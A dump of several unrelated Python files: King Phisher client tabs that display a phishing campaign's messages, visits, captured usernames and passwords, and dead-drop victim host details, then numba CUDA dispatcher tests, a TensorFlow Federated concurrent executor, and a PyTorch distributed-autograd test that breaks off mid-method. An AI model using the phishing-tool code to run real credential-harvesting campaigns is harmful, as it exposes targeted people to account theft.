self.logger.debug("joined thread: {0}.loader_thread (tid: 0x{1:x})".format(self.__class__.__name__, self.loader_thread.ident))
class CampaignViewGenericTableTab(CampaignViewGenericTab):
"""
This object is meant to be subclassed by tabs which will display
campaign information of different types from specific database
tables. The data in this object is refreshed when multiple events
occur and it uses an internal timer to represent the last time the
data was refreshed.
"""
gobject_ids = [
'button_refresh',
'treeview_campaign'
]
remote_table_name = ''
"""The database table represented by this tab."""
view_columns = {}
"""The dictionary map of column numbers to column names starting at column 1."""
def __init__(self, *args, **kwargs):
super(CampaignViewGenericTableTab, self).__init__(*args, **kwargs)
treeview = self.gobjects['treeview_campaign']
treeview.get_selection().set_mode(Gtk.SelectionMode.MULTIPLE)
popup_copy_submenu = Gtk.Menu.new()
self.view_column_renderers = {}
columns = self.view_columns
for column_id in range(1, len(columns) + 1):
column_name = columns[column_id]
column = Gtk.TreeViewColumn(column_name, Gtk.CellRendererText(), text=column_id)
column.set_sort_column_id(column_id)
treeview.append_column(column)
self.view_column_renderers[column_id] = column
menu_item = Gtk.MenuItem.new_with_label(column_name)
menu_item.connect('activate', self.signal_activate_popup_menu_copy, column_id)
popup_copy_submenu.append(menu_item)
self.popup_menu = Gtk.Menu.new()
"""The :py:class:`Gtk.Menu` object which is displayed when right-clicking in the view area."""
menu_item = Gtk.MenuItem.new_with_label('Copy')
menu_item.set_submenu(popup_copy_submenu)
self.popup_menu.append(menu_item)
menu_item = Gtk.SeparatorMenuItem()
self.popup_menu.append(menu_item)
menu_item = Gtk.MenuItem.new_with_label('Delete')
menu_item.connect('activate', lambda _: self._prompt_to_delete_row())
self.popup_menu.append(menu_item)
self.popup_menu.show_all()
def _prompt_to_delete_row(self):
selection = self.gobjects['treeview_campaign'].get_selection()
if not selection.count_selected_rows():
return
if isinstance(self.loader_thread, threading.Thread) and self.loader_thread.is_alive():
gui_utilities.show_dialog_warning('Can Not Delete Rows While Loading', self.parent)
return
(model, tree_paths) = selection.get_selected_rows()
if not tree_paths:
return
tree_iters = map(model.get_iter, tree_paths)
row_ids = map(lambda ti: model.get_value(ti, 0), tree_iters)
if len(row_ids) == 1:
message = 'Delete This Row?'
else:
message = "Delete These {0:,} Rows?".format(len(row_ids))
if not gui_utilities.show_dialog_yes_no(message, self.parent, 'This information will be lost.'):
return
for row_id in row_ids:
self.parent.rpc(self.remote_table_name + '/delete', row_id)
self.load_campaign_information(force=True)
def format_row_data(self, row):
"""
This method is overridden by subclasses to format the raw row
data returned from the server. The length of the list must equal
the number of columns in the table. This method is called for
each row in the remote table by the loader thread.
:return: The formated row data.
:rtype: list
"""
raise NotImplementedError()
def format_cell_data(self, cell_data):
"""
This method provides formatting to the individual cell values returned
from the :py:meth:`.format_row_data` function. Values are converted into
a format suitable for reading.
:param cell: The value to format.
:return: The formatted cell value.
:rtype: str
"""
if isinstance(cell_data, datetime.datetime):
cell_data = utilities.datetime_utc_to_local(cell_data)
return utilities.format_datetime(cell_data)
elif cell_data == None:
return ''
return str(cell_data)
def load_campaign_information(self, force=False):
"""
Load the necessary campaign information from the remote server.
Unless *force* is True, the
:py:attr:`~.CampaignViewGenericTab.last_load_time` is compared
with the :py:attr:`~.CampaignViewGenericTab.refresh_frequency` to
check if the information is stale. If the local data is not stale,
this function will return without updating the table.
:param bool force: Ignore the load life time and force loading the remote data.
"""
if not force and ((time.time() - self.last_load_time) < self.refresh_frequency):
return
if isinstance(self.loader_thread, threading.Thread) and self.loader_thread.is_alive():
return
self.loader_thread_lock.acquire()
treeview = self.gobjects['treeview_campaign']
store = treeview.get_model()
if store == None:
store_columns = [str]
map(lambda x: store_columns.append(str), range(len(self.view_columns)))
store = Gtk.ListStore(*store_columns)
treeview.set_model(store)
else:
store.clear()
self.loader_thread = threading.Thread(target=self.loader_thread_routine, args=(store,))
self.loader_thread.daemon = True
self.loader_thread.start()
self.loader_thread_lock.release()
return
def loader_thread_routine(self, store):
"""
The loading routine to be executed within a thread.
:param store: The store object to place the new data.
:type store: :py:class:`Gtk.ListStore`
"""
gui_utilities.glib_idle_add_wait(lambda: self.gobjects['treeview_campaign'].set_property('sensitive', False))
for row_data in self.parent.rpc.remote_table('campaign/' + self.remote_table_name, self.config['campaign_id']):
if self.is_destroyed.is_set():
break
row_id = row_data['id']
row_data = self.format_row_data(row_data)
if row_data == None:
self.parent.rpc(self.remote_table_name + '/delete', row_id)
continue
row_data = list(map(self.format_cell_data, row_data))
row_data.insert(0, str(row_id))
gui_utilities.glib_idle_add_wait(store.append, row_data)
if self.is_destroyed.is_set():
return
gui_utilities.glib_idle_add_wait(lambda: self.gobjects['treeview_campaign'].set_property('sensitive', True))
self.last_load_time = time.time()
def signal_button_clicked_export(self, button):
if isinstance(self.loader_thread, threading.Thread) and self.loader_thread.is_alive():
gui_utilities.show_dialog_warning('Can Not Export Rows While Loading', self.parent)
return
dialog = gui_utilities.UtilityFileChooser('Export Data', self.parent)
file_name = self.config['campaign_name'] + '.csv'
response = dialog.run_quick_save(file_name)
dialog.destroy()
if not response:
return
destination_file = response['target_path']
export.treeview_liststore_to_csv(self.gobjects['treeview_campaign'], destination_file)
def signal_treeview_button_pressed(self, widget, event):
if not (event.type == Gdk.EventType.BUTTON_PRESS and event.button == 3):
return
selection = self.gobjects['treeview_campaign'].get_selection()
if not selection.count_selected_rows():
return
pos_func = lambda m, d: (event.get_root_coords()[0], event.get_root_coords()[1], True)
self.popup_menu.popup(None, None, pos_func, None, event.button, event.time)
return True
def signal_treeview_key_pressed(self, widget, event):
if event.type != Gdk.EventType.KEY_PRESS:
return
treeview = self.gobjects['treeview_campaign']
keyval = event.get_keyval()[1]
if event.get_state() == Gdk.ModifierType.CONTROL_MASK:
if keyval == Gdk.KEY_c:
gui_utilities.gtk_treeview_selection_to_clipboard(treeview)
elif keyval == Gdk.KEY_F5:
self.load_campaign_information(force=True)
elif keyval == Gdk.KEY_Delete:
self._prompt_to_delete_row()
def signal_activate_popup_menu_copy(self, widget, column_id):
treeview = self.gobjects['treeview_campaign']
gui_utilities.gtk_treeview_selection_to_clipboard(treeview, column_id)
class CampaignViewDeaddropTab(CampaignViewGenericTableTab):
"""Display campaign information regarding dead drop connections."""
remote_table_name = 'deaddrop_connections'
label_text = 'Deaddrop'
view_columns = {
1: 'Destination',
2: 'Visit Count',
3: 'External IP',
4: 'Username',
5: 'Hostname',
6: 'Local IP Addresses',
7: 'First Hit',
8: 'Last Hit'
}
def format_row_data(self, connection):
deploy_id = connection['deployment_id']
deploy_details = self.parent.rpc.remote_table_row('deaddrop_deployments', deploy_id, cache=True)
if not deploy_details:
return None
row = (
deploy_details['destination'],
connection['visit_count'],
connection['visitor_ip'],
connection['local_username'],
connection['local_hostname'],
connection['local_ip_addresses'],
connection['first_visit'],
connection['last_visit']
)
return row
class CampaignViewCredentialsTab(CampaignViewGenericTableTab):
"""Display campaign information regarding submitted credentials."""
remote_table_name = 'credentials'
label_text = 'Credentials'
view_columns = {
1: 'Email',
2: 'Username',
3: 'Password',
4: 'Submitted'
}
def __init__(self, *args, **kwargs):
super(CampaignViewCredentialsTab, self).__init__(*args, **kwargs)
self.view_column_renderers[3].set_property('visible', False)
def format_row_data(self, credential):
msg_id = credential['message_id']
msg_details = self.parent.rpc.remote_table_row('messages', msg_id, cache=True)
if not msg_details:
return None
row = (
msg_details['target_email'],
credential['username'],
credential['password'],
credential['submitted']
)
return row
def signal_button_toggled_show_passwords(self, button):
self.view_column_renderers[3].set_property('visible', button.get_property('active'))
class CampaignViewDashboardTab(CampaignViewGenericTab):
"""Display campaign information on a graphical dash board."""
gobject_ids = [
'box_top_left',
'box_top_right',
'box_bottom',
'scrolledwindow_top_left',
'scrolledwindow_top_right',
'scrolledwindow_bottom'
]
label_text = 'Dashboard'
"""The tabs label for display in the GUI."""
def __init__(self, *args, **kwargs):
super(CampaignViewDashboardTab, self).__init__(*args, **kwargs)
self.graphs = []
"""The :py:class:`.CampaignGraph` classes represented on the dash board."""
# Position: (DefaultGraphName, Size)
dash_ports = {
'top_left': (380, 200),
'top_right': (380, 200),
'bottom': None
}
for dash_port, details in dash_ports.items():
graph_name = self.config['dashboard.' + dash_port]
Klass = graphs.get_graph(graph_name)
if not Klass:
self.logger.warning('could not get graph: ' + graph_name)
continue
graph_inst = Klass(self.config, self.parent, details)
self.gobjects['scrolledwindow_' + dash_port].add_with_viewport(graph_inst.canvas)
self.gobjects['box_' + dash_port].pack_end(graph_inst.navigation_toolbar, False, False, 0)
self.graphs.append(graph_inst)
self.logger.debug("dashboard refresh frequency set to {0} seconds".format(self.refresh_frequency))
GLib.timeout_add_seconds(self.refresh_frequency, self.loader_idle_routine)
def load_campaign_information(self, force=False):
"""
Load the necessary campaign information from the remote server.
Unless *force* is True, the
:py:attr:`~.CampaignViewDashboardTab.last_load_time` is compared
with the :py:attr:`~.CampaignViewDashboardTab.refresh_frequency` to
check if the information is stale. If the local data is not
stale, this function will return without updating the table.
:param bool force: Ignore the load life time and force loading the remote data.
"""
if not force and ((time.time() - self.last_load_time) < self.refresh_frequency):
return
if not hasattr(self.parent, 'rpc'):
self.logger.warning('skipping load_campaign_information because rpc is not initialized')
return
with self.loader_thread_lock:
if isinstance(self.loader_thread, threading.Thread) and self.loader_thread.is_alive():
return
self.loader_thread = threading.Thread(target=self.loader_thread_routine)
self.loader_thread.daemon = True
self.loader_thread.start()
def loader_idle_routine(self):
"""The routine which refreshes the campaign data at a regular interval."""
self.logger.debug('idle loader routine called')
self.load_campaign_information(force=True)
return True
def loader_thread_routine(self):
"""The loading routine to be executed within a thread."""
info_cache = {}
for graph in self.graphs:
if self.is_destroyed.is_set():
break
info_cache = gui_utilities.glib_idle_add_wait(lambda: graph.refresh(info_cache, self.is_destroyed))
self.last_load_time = time.time()
class CampaignViewVisitsTab(CampaignViewGenericTableTab):
"""Display campaign information regarding incoming visitors."""
remote_table_name = 'visits'
label_text = 'Visits'
view_columns = {
1: 'Email',
2: 'Visitor IP',
3: 'Visitor Details',
4: 'Visit Count',
5: 'First Visit',
6: 'Last Visit'
}
def format_row_data(self, visit):
msg_id = visit['message_id']
msg_details = self.parent.rpc.remote_table_row('messages', msg_id, cache=True)
if not msg_details:
return None
row = (
msg_details['target_email'],
visit['visitor_ip'],
visit['visitor_details'],
visit['visit_count'],
visit['first_visit'],
visit['last_visit']
)
return row
class CampaignViewMessagesTab(CampaignViewGenericTableTab):
"""Display campaign information regarding sent messages."""
remote_table_name = 'messages'
label_text = 'Messages'
view_columns = {
1: 'Email',
2: 'Sent',
3: 'Opened',
4: 'Trained'
}
def format_row_data(self, message):
row = (
message['target_email'],
message['sent'],
message['opened'],
('Yes' if message['trained'] else '')
)
return row
class CampaignViewTab(object):
"""
The King Phisher client top-level 'View Campaign' tab. This object
manages the sub-tabs which display all the information regarding
the current campaign.
"""
def __init__(self, config, parent):
"""
:param dict config: The King Phisher client configuration.
:param parent: The parent window for this object.
:type parent: :py:class:`Gtk.Window`
"""
self.config = config
self.parent = parent
self.logger = logging.getLogger('KingPhisher.Client.' + self.__class__.__name__)
self.box = Gtk.Box()
self.box.set_property('orientation', Gtk.Orientation.VERTICAL)
self.box.show()
self.label = Gtk.Label(label='View Campaign')
"""The :py:class:`Gtk.Label` representing this tabs name."""
self.notebook = Gtk.Notebook()
""" The :py:class:`Gtk.Notebook` for holding sub-tabs."""
self.notebook.connect('switch-page', self.signal_notebook_switch_page)
self.notebook.set_scrollable(True)
self.box.pack_start(self.notebook, True, True, 0)
self.tabs = {}
"""A dict object holding the sub tabs managed by this object."""
current_page = self.notebook.get_current_page()
self.last_page_id = current_page
if graphs.has_matplotlib:
self.logger.info('matplotlib is installed, dashboard will be available')
dashboard_tab = CampaignViewDashboardTab(self.config, self.parent)
self.tabs['dashboard'] = dashboard_tab
self.notebook.append_page(dashboard_tab.box, dashboard_tab.label)
else:
self.logger.warning('matplotlib is not installed, dashboard will not be available')
messages_tab = CampaignViewMessagesTab(self.config, self.parent)
self.tabs['messages'] = messages_tab
self.notebook.append_page(messages_tab.box, messages_tab.label)
visits_tab = CampaignViewVisitsTab(self.config, self.parent)
self.tabs['visits'] = visits_tab
self.notebook.append_page(visits_tab.box, visits_tab.label)
credentials_tab = CampaignViewCredentialsTab(self.config, self.parent)
self.tabs['credentials'] = credentials_tab
self.notebook.append_page(credentials_tab.box, credentials_tab.label)
deaddrop_connections_tab = CampaignViewDeaddropTab(self.config, self.parent)
self.tabs['deaddrop_connections'] = deaddrop_connections_tab
self.notebook.append_page(deaddrop_connections_tab.box, deaddrop_connections_tab.label)
for tab in self.tabs.values():
tab.box.show()
self.notebook.show()
self.parent.connect('campaign-set', self.signal_kpc_campaign_set)
def signal_kpc_campaign_set(self, kpc, cid):
for tab_name, tab in self.tabs.items():
if hasattr(tab, 'load_campaign_information'):
tab.load_campaign_information(force=True)
def signal_notebook_switch_page(self, notebook, current_page, index):
if not hasattr(self.parent, 'rpc'):
return
#previous_page = notebook.get_nth_page(self.last_page_id)
self.last_page_id = index
for tab_name, tab in self.tabs.items():
if current_page != tab.box:
continue
if hasattr(tab, 'load_campaign_information'):
tab.load_campaign_information()
|
test_dispatcher.py
|
import numpy as np
import threading
from numba import cuda, float32, float64, int32, int64, void
from numba.cuda.testing import skip_on_cudasim, unittest, CUDATestCase
import math
def add(x, y):
return x + y
def add_kernel(r, x, y):
r[0] = x + y
@skip_on_cudasim('Dispatcher objects not used in the simulator')
class TestDispatcher(CUDATestCase):
def _test_no_double_specialize(self, dispatcher, ty):
with self.assertRaises(RuntimeError) as e:
dispatcher.specialize(ty)
self.assertIn('Dispatcher already specialized', str(e.exception))
def test_no_double_specialize_sig_same_types(self):
# Attempting to specialize a kernel jitted with a signature is illegal,
# even for the same types the kernel is already specialized for.
@cuda.jit('void(float32[::1])')
def f(x):
pass
self._test_no_double_specialize(f, float32[::1])
def test_no_double_specialize_no_sig_same_types(self):
# Attempting to specialize an already-specialized kernel is illegal,
# even for the same types the kernel is already specialized for.
@cuda.jit
def f(x):
pass
f_specialized = f.specialize(float32[::1])
self._test_no_double_specialize(f_specialized, float32[::1])
def test_no_double_specialize_sig_diff_types(self):
# Attempting to specialize a kernel jitted with a signature is illegal.
@cuda.jit('void(int32[::1])')
def f(x):
pass
self._test_no_double_specialize(f, float32[::1])
def test_no_double_specialize_no_sig_diff_types(self):
# Attempting to specialize an already-specialized kernel is illegal.
@cuda.jit
def f(x):
pass
f_specialized = f.specialize(int32[::1])
self._test_no_double_specialize(f_specialized, float32[::1])
def test_specialize_cache_same(self):
# Ensure that the same dispatcher is returned for the same argument
# types, and that different dispatchers are returned for different
# argument types.
@cuda.jit
def f(x):
pass
self.assertEqual(len(f.specializations), 0)
f_float32 = f.specialize(float32[::1])
self.assertEqual(len(f.specializations), 1)
f_float32_2 = f.specialize(float32[::1])
self.assertEqual(len(f.specializations), 1)
self.assertIs(f_float32, f_float32_2)
f_int32 = f.specialize(int32[::1])
self.assertEqual(len(f.specializations), 2)
self.assertIsNot(f_int32, f_float32)
def test_specialize_cache_same_with_ordering(self):
# Ensure that the same dispatcher is returned for the same argument
# types, and that different dispatchers are returned for different
# argument types, taking into account array ordering and multiple
# arguments.
@cuda.jit
def f(x, y):
pass
self.assertEqual(len(f.specializations), 0)
# 'A' order specialization
f_f32a_f32a = f.specialize(float32[:], float32[:])
self.assertEqual(len(f.specializations), 1)
# 'C' order specialization
f_f32c_f32c = f.specialize(float32[::1], float32[::1])
self.assertEqual(len(f.specializations), 2)
self.assertIsNot(f_f32a_f32a, f_f32c_f32c)
# Reuse 'C' order specialization
f_f32c_f32c_2 = f.specialize(float32[::1], float32[::1])
self.assertEqual(len(f.specializations), 2)
self.assertIs(f_f32c_f32c, f_f32c_f32c_2)
# The following tests are based on those in numba.tests.test_dispatcher
def test_coerce_input_types(self):
# Do not allow unsafe conversions if we can still compile other
# specializations.
c_add = cuda.jit(add_kernel)
# Using a complex128 allows us to represent any result produced by the
# test
r = np.zeros(1, dtype=np.complex128)
c_add[1, 1](r, 123, 456)
self.assertEqual(r[0], add(123, 456))
c_add[1, 1](r, 12.3, 45.6)
self.assertEqual(r[0], add(12.3, 45.6))
c_add[1, 1](r, 12.3, 45.6j)
self.assertEqual(r[0], add(12.3, 45.6j))
c_add[1, 1](r, 12300000000, 456)
self.assertEqual(r[0], add(12300000000, 456))
# Now force compilation of only a single specialization
c_add = cuda.jit('(i4[::1], i4, i4)')(add_kernel)
r = np.zeros(1, dtype=np.int32)
c_add[1, 1](r, 123, 456)
self.assertPreciseEqual(r[0], add(123, 456))
@unittest.expectedFailure
def test_coerce_input_types_unsafe(self):
# Implicit (unsafe) conversion of float to int, originally from
# test_coerce_input_types. This test presently fails with the CUDA
# Dispatcher because argument preparation is done by
# _Kernel._prepare_args, which is currently inflexible with respect to
# the types it can accept when preparing.
#
# This test is marked as xfail until future changes enable this
# behavior.
c_add = cuda.jit('(i4[::1], i4, i4)')(add_kernel)
r = np.zeros(1, dtype=np.int32)
c_add[1, 1](r, 12.3, 45.6)
self.assertPreciseEqual(r[0], add(12, 45))
def test_coerce_input_types_unsafe_complex(self):
# Implicit conversion of complex to int disallowed
c_add = cuda.jit('(i4[::1], i4, i4)')(add_kernel)
r = np.zeros(1, dtype=np.int32)
with self.assertRaises(TypeError):
c_add[1, 1](r, 12.3, 45.6j)
def test_ambiguous_new_version(self):
"""Test compiling new version in an ambiguous case
"""
c_add = cuda.jit(add_kernel)
r = np.zeros(1, dtype=np.float64)
INT = 1
FLT = 1.5
c_add[1, 1](r, INT, FLT)
self.assertAlmostEqual(r[0], INT + FLT)
self.assertEqual(len(c_add.overloads), 1)
c_add[1, 1](r, FLT, INT)
self.assertAlmostEqual(r[0], FLT + INT)
self.assertEqual(len(c_add.overloads), 2)
c_add[1, 1](r, FLT, FLT)
self.assertAlmostEqual(r[0], FLT + FLT)
self.assertEqual(len(c_add.overloads), 3)
# The following call is ambiguous because (int, int) can resolve
# to (float, int) or (int, float) with equal weight.
c_add[1, 1](r, 1, 1)
self.assertAlmostEqual(r[0], INT + INT)
self.assertEqual(len(c_add.overloads), 4, "didn't compile a new "
"version")
def test_lock(self):
"""
Test that (lazy) compiling from several threads at once doesn't
produce errors (see issue #908).
"""
errors = []
@cuda.jit
def foo(r, x):
r[0] = x + 1
def wrapper():
try:
r = np.zeros(1, dtype=np.int64)
foo[1, 1](r, 1)
self.assertEqual(r[0], 2)
except Exception as e:
errors.append(e)
threads = [threading.Thread(target=wrapper) for i in range(16)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertFalse(errors)
def test_get_regs_per_thread_unspecialized(self):
# A kernel where the register usage per thread is likely to differ
# between different specializations
@cuda.jit
def pi_sin_array(x, n):
i = cuda.grid(1)
if i < n:
x[i] = 3.14 * math.sin(x[i])
# Call the kernel with different arguments to create two different
# definitions within the Dispatcher object
N = 10
arr_f32 = np.zeros(N, dtype=np.float32)
arr_f64 = np.zeros(N, dtype=np.float64)
pi_sin_array[1, N](arr_f32, N)
pi_sin_array[1, N](arr_f64, N)
# Check we get a positive integer for the two different variations
sig_f32 = void(float32[::1], int64)
sig_f64 = void(float64[::1], int64)
regs_per_thread_f32 = pi_sin_array.get_regs_per_thread(sig_f32)
regs_per_thread_f64 = pi_sin_array.get_regs_per_thread(sig_f64)
self.assertIsInstance(regs_per_thread_f32, int)
self.assertIsInstance(regs_per_thread_f64, int)
self.assertGreater(regs_per_thread_f32, 0)
self.assertGreater(regs_per_thread_f64, 0)
# Check that getting the registers per thread for all signatures
# provides the same values as getting the registers per thread for
# individual signatures.
regs_per_thread_all = pi_sin_array.get_regs_per_thread()
self.assertEqual(regs_per_thread_all[sig_f32.args],
regs_per_thread_f32)
self.assertEqual(regs_per_thread_all[sig_f64.args],
regs_per_thread_f64)
if regs_per_thread_f32 == regs_per_thread_f64:
# If the register usage is the same for both variants, there may be
# a bug, but this may also be an artifact of the compiler / driver
# / device combination, so produce an informational message only.
print('f32 and f64 variant thread usages are equal.')
print('This may warrant some investigation. Devices:')
cuda.detect()
def test_get_regs_per_thread_specialized(self):
@cuda.jit(void(float32[::1], int64))
def pi_sin_array(x, n):
i = cuda.grid(1)
if i < n:
x[i] = 3.14 * math.sin(x[i])
# Check we get a positive integer for the specialized variation
regs_per_thread = pi_sin_array.get_regs_per_thread()
self.assertIsInstance(regs_per_thread, int)
self.assertGreater(regs_per_thread, 0)
def test_dispatcher_docstring(self):
# Ensure that CUDA-jitting a function preserves its docstring. See
# Issue #5902: https://github.com/numba/numba/issues/5902
@cuda.jit
def add_kernel(a, b):
"""Add two integers, kernel version"""
@cuda.jit(device=True)
def add_device(a, b):
"""Add two integers, device version"""
self.assertEqual("Add two integers, kernel version", add_kernel.__doc__)
self.assertEqual("Add two integers, device version", add_device.__doc__)
if __name__ == '__main__':
unittest.main()
|
concurrent_executor.py
|
# Lint as: python3
# Copyright 2019, The TensorFlow Federated Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A concurrent executor that does work asynchronously in multiple threads."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import asyncio
import functools
import threading
from tensorflow_federated.python.common_libs import py_typecheck
from tensorflow_federated.python.core.impl import executor_base
class ConcurrentExecutor(executor_base.Executor):
"""The concurrent executor delegates work to a separate thread.
This executor only handles threading. It delegates all execution to an
underlying pool of target executors.
NOTE: This component is only available in Python 3.
"""
# TODO(b/134543154): Upgrade this to a threadpool with multiple workers,
# possibly one that could be shared among multiple of these executors.
def __init__(self, target_executor):
"""Creates a concurrent executor backed by a target executor.
Args:
target_executor: The executor that does all the work.
"""
py_typecheck.check_type(target_executor, executor_base.Executor)
self._target_executor = target_executor
self._event_loop = asyncio.new_event_loop()
def run_loop(loop):
loop.run_forever()
loop.close()
self._thread = threading.Thread(
target=functools.partial(run_loop, self._event_loop))
self._thread.start()
def __del__(self):
self._event_loop.call_soon_threadsafe(self._event_loop.stop)
self._thread.join()
def _delegate(self, coro):
return asyncio.wrap_future(
asyncio.run_coroutine_threadsafe(coro, self._event_loop))
async def create_value(self, value, type_spec=None):
return await self._delegate(
self._target_executor.create_value(value, type_spec))
async def create_call(self, comp, arg=None):
return await self._delegate(self._target_executor.create_call(comp, arg))
async def create_tuple(self, elements):
return await self._delegate(self._target_executor.create_tuple(elements))
async def create_selection(self, source, index=None, name=None):
return await self._delegate(
self._target_executor.create_selection(source, index=index, name=name))
|
dist_autograd_test.py
|
import sys
import threading
import time
import unittest
from enum import Enum
import random
import torch
from datetime import timedelta
import torch.distributed as dist
import torch.distributed.autograd as dist_autograd
import torch.distributed.rpc as rpc
import torch.testing._internal.dist_utils
from torch.autograd import Function
from torch.autograd.function import once_differentiable
from torch.distributed.rpc import RRef
from torch.testing._internal.common_utils import IS_MACOS
from torch.testing._internal.dist_utils import (
dist_init,
initialize_pg,
wait_until_node_failure,
worker_name,
)
from torch.testing._internal.distributed.rpc.rpc_agent_test_fixture import (
RpcAgentTestFixture,
)
from torch.testing._internal.common_distributed import skip_if_lt_x_gpu
# Right now we test up to 3-layer nested rpc calls.
# rpc_done[1] and ctx_ids[1] represent rpc is done in prev rank, and context id
# sent from prev rank respectively.
# rpc_done[2] and ctx_ids[2] represents for prev of prev rank.
# rpc_done[3] and ctx_ids[3] represents for prev of prev of prev rank.
# rpc_done[0] and ctx_ids[0] represents for current rank, but mostly not used.
rpc_done = [False, False, False, False]
ctx_ids = [-1, -1, -1, -1]
known_context_ids = set()
requires_grad_tensor = torch.ones(3, 3, requires_grad=True)
# Send rpc done info and context_id to
# dst_rank = (self.rank + rank_distance) % self.world_size
# we don't need a lock here since the GIL is held while executing remote
# python UDFs, so access is serialized across several workers.
def _set_rpc_done(ctx_id, rank_distance):
global rpc_done
global ctx_ids
global known_context_ids
rpc_done[rank_distance] = True
ctx_ids[rank_distance] = ctx_id
known_context_ids.add(ctx_id)
def _check_rpc_done(rank_distance):
while not rpc_done[rank_distance]:
time.sleep(0.1)
def _torch_ones(sizes, requires_grad=False):
return torch.ones(sizes, requires_grad=requires_grad)
# This method must be called on the rref owner, and verifies that the grad of
# rref tensor equals to the given grad.
def _compare_owner_value(context_id, rref, grad):
grads = dist_autograd.get_gradients(context_id)
return torch.equal(grads[rref.local_value()], grad)
def create_tensor():
return torch.ones((3, 3), requires_grad=True)
@torch.jit.script
def create_torchscript_tensor() -> torch.Tensor:
return torch.ones((3, 3)).requires_grad_()
def my_py_add(t1, t2):
return torch.add(t1, t2)
def my_scalar_add(a, b):
return a + b
def my_rref_add(rref_t1, t2):
ret = torch.add(rref_t1.local_value(), t2)
return ret
@torch.jit.script
def my_script_add(t1, t2):
return torch.add(t1, t2)
@torch.jit.script
def my_script_ref_add(ref_t1: RRef[torch.Tensor], t2: torch.Tensor) -> torch.Tensor:
t1 = ref_t1.to_here()
return torch.add(t1, t2)
def my_nested_rref_add(dst, rref_t1, t2):
return rpc.rpc_sync(dst, my_rref_add, args=(rref_t1, t2))
def ret_requires_grad():
return requires_grad_tensor
def my_py_nested_call(t1, t2, dst, world_size, hops):
next_dst = (dst + 1) % world_size
if hops > 0:
return rpc.rpc_sync(
worker_name(next_dst),
my_py_nested_call,
args=(t1, t2, next_dst, world_size, hops - 1),
)
else:
return rpc.rpc_sync(worker_name(next_dst), my_py_add, args=(t1, t2))
# after dist autograd context is cleaned up, it should be cleaned up on other
# nodes. This helper allows timeout_seconds for those RPCs to be completed, and
# ensures that all the contexts have been cleaned up in that timeframe.any
def _all_contexts_cleaned_up(timeout_seconds=10):
global known_context_ids
start = time.time()
context_id_to_raised = set()
while (
time.time() - start < timeout_seconds
and context_id_to_raised != known_context_ids
):
for context_id in known_context_ids:
try:
dist_autograd._retrieve_context(context_id)
except RuntimeError:
context_id_to_raised.add(context_id)
# all contexts have been cleaned up if trying to retrieve any context resulted in a RuntimeError.
success = context_id_to_raised == known_context_ids
return success
# This function creates a dis atugorad context, run rpc_sync on the given ps,
# and then blocks until the ps has verified the grads are correctly accumulated.
def _run_trainer(rref_t1, t2, ps, rank_diff):
with dist_autograd.context() as context_id:
ret = rpc.rpc_sync(ps, my_rref_add, args=(rref_t1, t2))
dist_autograd.backward(context_id, [ret.sum()])
# prevent deleting dist autograd context
rpc.rpc_sync(ps, _set_rpc_done, args=(context_id, rank_diff))
rpc.rpc_sync(ps, _check_rpc_done, args=(0,))
# This function is the same as _run_trainer, except rpc calls torchscript
# function "my_script_ref_add" instead of python funciton "my_rref_add"
def _run_trainer_torchscript(rref_t1, t2, ps, rank_diff):
with dist_autograd.context() as context_id:
ret = rpc.rpc_sync(ps, my_script_ref_add, args=(rref_t1, t2))
dist_autograd.backward(context_id, [ret.sum()])
# prevent deleting dist autograd context
rpc.rpc_sync(ps, _set_rpc_done, args=(context_id, rank_diff))
rpc.rpc_sync(ps, _check_rpc_done, args=(0,))
class SimulateBackwardError(Function):
_simulate_error = True
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, input):
if SimulateBackwardError._simulate_error:
raise Exception("Simulate error on backward pass")
else:
return input
class ExecMode(Enum):
LOCAL = 1 # Run the operation locally.
RPC_SYNC = 2 # Run the operation using rpc_sync
REMOTE = 3 # Run the operation using remote.
RPC_ASYNC = 4 # Run the operation using rpc_async
class DistAutogradTest(RpcAgentTestFixture):
def _exec_func_with_dst(self, dst, exec_mode, method, *args):
if ExecMode.LOCAL == exec_mode:
if len(args) == 1 and isinstance(args[0], list):
return method(*args[0])
return method(*args)
elif ExecMode.RPC_SYNC == exec_mode:
return rpc.rpc_sync(worker_name(dst), method, args=(args))
elif ExecMode.REMOTE == exec_mode:
return rpc.remote(worker_name(dst), method, args=(args)).to_here()
elif ExecMode.RPC_ASYNC == exec_mode:
fut = rpc.rpc_async(worker_name(dst), method, args=(args))
return fut.wait()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
def _exec_func(self, exec_mode, method, *args):
return self._exec_func_with_dst(
self._next_rank(), exec_mode, method, *args
)
def _next_rank(self):
if hasattr(self, "dst_rank"):
self.dst_rank = (self.dst_rank + 1) % self.world_size
if self.dst_rank == self.rank:
return self._next_rank()
else:
self.dst_rank = (self.rank + 1) % self.world_size
return self.dst_rank
def _check_rpc_done(self, rank_distance):
_check_rpc_done(rank_distance)
@dist_init
def test_autograd_context(self):
# Verify max possible id.
max_auto_increment = 281474976710655
self.assertEqual(
max_auto_increment + (self.worker_id << 48), dist_autograd._get_max_id()
)
context_ids = []
for i in range(200):
with dist_autograd.context() as context_id:
self.assertEqual(
context_id,
dist_autograd._retrieve_context(context_id)._context_id(),
)
# First 16 bits should be worker_id.
self.assertEqual(self.worker_id, context_id >> 48)
context_ids.append(context_id)
for context_id in context_ids:
with self.assertRaisesRegex(
RuntimeError,
"Could not find autograd context with id: {}".format(context_id),
):
dist_autograd._retrieve_context(context_id)
@dist_init
def test_nested_context(self):
with dist_autograd.context() as context_id:
# Nested contexts not supported.
with self.assertRaisesRegex(
RuntimeError, "Already have an autograd context id for this thread"
):
with dist_autograd.context() as context_id:
pass
# For current context, this rank sends t1 and t2 tensors to dst_rank,
# then get t3 = torch.add(t1, t2) result tensor.
# For the current context in this rank, it expects graph like this:
# send function:
# rpcSendBackward
# / \
# t1.AccumulateGrad t2.AccumulateGrad
#
# recv function:
#
# |
# t3.rpcRecvBackward
#
def _verify_graph_for_first_rpc_call(
self, send_function, recv_function, t1, t2, ret
):
